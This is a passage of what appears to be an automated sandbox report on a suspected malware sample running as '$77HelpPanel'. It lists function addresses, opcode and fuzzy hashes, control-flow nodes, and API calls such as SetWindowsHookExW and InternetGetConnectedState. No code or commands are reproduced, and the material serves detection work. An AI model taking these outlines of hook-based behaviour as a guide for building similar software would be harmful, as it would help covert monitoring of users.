                                                        • Opcode ID: fd7f4e06a51b40c8609d7d66f97c028e25556fd1c10cde783d4f81585e644685
                                                        • Instruction ID: 1fec2e55af4dc95cbbe649bd83b656a9d3f331b4dc1981aa044ccf87fd2fd31d
                                                        • Opcode Fuzzy Hash: fd7f4e06a51b40c8609d7d66f97c028e25556fd1c10cde783d4f81585e644685
                                                        • Instruction Fuzzy Hash: 8D91067190DB898FD719DB68D8056F9BBE0EF56321F0482BFD049D35A2CB646806C791
                                                        Function 00007FFAAB419408 Relevance: 1.7, APIs: 1, Instructions: 210COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 388 7ffaab419408-7ffaab4194ca 398 7ffaab4194cc-7ffaab4194d2 388->398 399 7ffaab4194d4-7ffaab41a5ed 388->399 398->399 405 7ffaab41a5f3-7ffaab41a600 399->405 406 7ffaab41a679-7ffaab41a67d 399->406 407 7ffaab41a602-7ffaab41a63f SetWindowsHookExW 405->407 406->407 409 7ffaab41a641 407->409 410 7ffaab41a647-7ffaab41a678 407->410 409->410
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.2619386027.00007FFAAB410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB410000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_7ffaab410000_$77HelpPanel.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5c9ad10c3809a0ea7f01bfbee6c8c4875a4f32b310e65271c04c949157e1ebdc
                                                        • Instruction ID: 8db9f4547bf14a3d9b4fdc25de07d29db9bb894c398b51e01aa3d926c079fe49
                                                        • Opcode Fuzzy Hash: 5c9ad10c3809a0ea7f01bfbee6c8c4875a4f32b310e65271c04c949157e1ebdc
                                                        • Instruction Fuzzy Hash: 95514B72D0C6998FD718EB6CE8069F977D0EF65324F0442BAD04DD71A3DE24684687C1
                                                        Function 00007FFAAB4194D0 Relevance: 1.6, APIs: 1, Instructions: 130COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 484 7ffaab4194d0-7ffaab41a5ed 489 7ffaab41a5f3-7ffaab41a600 484->489 490 7ffaab41a679-7ffaab41a67d 484->490 491 7ffaab41a602-7ffaab41a63f SetWindowsHookExW 489->491 490->491 493 7ffaab41a641 491->493 494 7ffaab41a647-7ffaab41a678 491->494 493->494
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.2619386027.00007FFAAB410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB410000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_7ffaab410000_$77HelpPanel.jbxd
                                                        Similarity
                                                        • API ID: HookWindows
                                                        • String ID:
                                                        • API String ID: 2559412058-0
                                                        • Opcode ID: ccd46d2847d7f9ae5013a31c0e49e9d53906ca2e504f67fe9b5f386d9d43a5ba
                                                        • Instruction ID: 5e01308ab46cd52366302a430a421ff929b92992aa16e3bfaa96e7c39f7a8461
                                                        • Opcode Fuzzy Hash: ccd46d2847d7f9ae5013a31c0e49e9d53906ca2e504f67fe9b5f386d9d43a5ba
                                                        • Instruction Fuzzy Hash: FB31077191CA5D8FDB18EB6CD8066B977E1EB69321F04427ED04DD32A2CE70A81687C1
                                                        Function 00007FFAAB4118ED Relevance: 1.6, APIs: 1, Instructions: 109networkCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 497 7ffaab4118ed-7ffaab411991 InternetGetConnectedState 502 7ffaab411993 497->502 503 7ffaab411999-7ffaab4119c0 497->503 502->503
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000A.00000002.2619386027.00007FFAAB410000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB410000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_10_2_7ffaab410000_$77HelpPanel.jbxd
                                                        Similarity
                                                        • API ID: ConnectedInternetState
                                                        • String ID:
                                                        • API String ID: 97057780-0
                                                        • Opcode ID: ef7f2511380ca4e56fb68a46ba1aefadbc65f1be50c7ccaace6145020cc4c1d0
                                                        • Instruction ID: 47aff6be8a6ec9b56eebfd67c00b4e24fcda32fd6e509f686e6c93885eae4277
                                                        • Opcode Fuzzy Hash: ef7f2511380ca4e56fb68a46ba1aefadbc65f1be50c7ccaace6145020cc4c1d0
                                                        • Instruction Fuzzy Hash: 3B31BF7190CA5C8FDB58DF9CD885AE97BE1EFA9321F14416FD009C31A2DB70A845CB81

                                                        Executed Functions

                                                        Function 00007FFAAB420FFE Relevance: 2.7, Strings: 2, Instructions: 238COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.1506895399.00007FFAAB420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB420000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_21_2_7ffaab420000_$77HelpPanel.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: (L5$r6/
                                                        • API String ID: 0-3256336562
                                                        • Opcode ID: 69698f6e42deb178b479bca6e9a455e36a64bd99badd2d79cac3ed4ebb6f6de1
                                                        • Instruction ID: ca617f7e108f7e5d636dd9ee38fd3f56d4f4eb9fb3299933833e71f45451954c
                                                        • Opcode Fuzzy Hash: 69698f6e42deb178b479bca6e9a455e36a64bd99badd2d79cac3ed4ebb6f6de1
                                                        • Instruction Fuzzy Hash: 90711A34A0DA898FDB85EB6CC455BB87BE1EF9E350F0441B9E04DC72A2CD24AC469791
                                                        Function 00007FFAAB4204C8 Relevance: 2.7, Strings: 2, Instructions: 215COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.1506895399.00007FFAAB420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB420000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_21_2_7ffaab420000_$77HelpPanel.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: (L5$r6/
                                                        • API String ID: 0-3256336562
                                                        • Opcode ID: c99ba3d5aac475c4b1d3f9b59f8c6f61dc1adc2b75d2ff56e6fa8a0952a75e3d
                                                        • Instruction ID: 29171559d0865ae28438113b1beb3c1d2b805e3569d69b26bf4beefb89b0959b
                                                        • Opcode Fuzzy Hash: c99ba3d5aac475c4b1d3f9b59f8c6f61dc1adc2b75d2ff56e6fa8a0952a75e3d
                                                        • Instruction Fuzzy Hash: BE51B375A089498FDB88EB6CD455BB8B7E1FF9D350F044179E04EC32A2DE24AC469781
                                                        Function 00007FFAAB420A35 Relevance: 2.7, Strings: 2, Instructions: 185COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.1506895399.00007FFAAB420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB420000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_21_2_7ffaab420000_$77HelpPanel.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 0D9$cBM_^
                                                        • API String ID: 0-1206066209
                                                        • Opcode ID: 0555061ecbd67700abadb41474db99f89f9b4acd613bbc91a2866bd59fef95a6
                                                        • Instruction ID: 561e9141cc783c8f416a4400f2d7526b2b3e103cafd7193a40726de6a0bd918c
                                                        • Opcode Fuzzy Hash: 0555061ecbd67700abadb41474db99f89f9b4acd613bbc91a2866bd59fef95a6
                                                        • Instruction Fuzzy Hash: 3A512765E09A5A8BF799B778C4457BA3AD0EF55384F4084B9D00DC33E3EE2CA8499391
                                                        Function 00007FFAAB421461 Relevance: 1.3, Strings: 1, Instructions: 57COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.1506895399.00007FFAAB420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB420000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_21_2_7ffaab420000_$77HelpPanel.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 8e9
                                                        • API String ID: 0-765408135
                                                        • Opcode ID: 453770480018472aa6e96af97c49e66ab6b6eb9350f8c7095a2221dd9c043ff3
                                                        • Instruction ID: ca2a4ce1762dc7654d18f7eec66d05b97f64c2f343c2c23395ebc5001e9751ed
                                                        • Opcode Fuzzy Hash: 453770480018472aa6e96af97c49e66ab6b6eb9350f8c7095a2221dd9c043ff3
                                                        • Instruction Fuzzy Hash: 1201682590D7918FE746A33898578F27FD0DF82364B0841EBE48CCB0A7D81C598697C1
                                                        Function 00007FFAAB420D0A Relevance: .3, Instructions: 291COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.1506895399.00007FFAAB420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB420000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_21_2_7ffaab420000_$77HelpPanel.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f6b5f314d34f86bddd241eaf3edb1a430da6f05e42c926ff45eec8bc7b2ca280
                                                        • Instruction ID: 1f94a2ab686ae1e285b86d9e957fb55b685679b034f58d36ce1171dc16d02f18
                                                        • Opcode Fuzzy Hash: f6b5f314d34f86bddd241eaf3edb1a430da6f05e42c926ff45eec8bc7b2ca280
                                                        • Instruction Fuzzy Hash: A1910860A1DA8A4FD796FB7CC469A657FE2EF8920074540F6E44DC73A7DC289C05C741
                                                        Function 00007FFAAB4207E0 Relevance: .2, Instructions: 175COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.1506895399.00007FFAAB420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB420000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_21_2_7ffaab420000_$77HelpPanel.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 8886019d4021642040253ab11760727ea25e8c8dbf71296d43bdc19c4b2ea712
                                                        • Instruction ID: fc258ef7fd8070b1fe380f516f3b9d0f89c63252b80f38c05ba3d2d2adfb4384
                                                        • Opcode Fuzzy Hash: 8886019d4021642040253ab11760727ea25e8c8dbf71296d43bdc19c4b2ea712
                                                        • Instruction Fuzzy Hash: FF410579908A4E8FD785EB6CC4909E97BB2FF89300B4444F5D048D73EFC92868018B61
                                                        Function 00007FFAAB421288 Relevance: .0, Instructions: 37COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000015.00000002.1506895399.00007FFAAB420000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB420000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_21_2_7ffaab420000_$77HelpPanel.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a8a99d3e5b1b0be373579458842e565c20424c925587017e44be4c690194e0d7
                                                        • Instruction ID: e244095e3b2119e8a85dbbd0f7f598a6ee882abf46c31d6f5becd7f6ee06771f
                                                        • Opcode Fuzzy Hash: a8a99d3e5b1b0be373579458842e565c20424c925587017e44be4c690194e0d7
                                                        • Instruction Fuzzy Hash: 2EE0617250D60C5EEA249659AC06DE63FA8EBC7234F00011EF44CC2012E1116517C351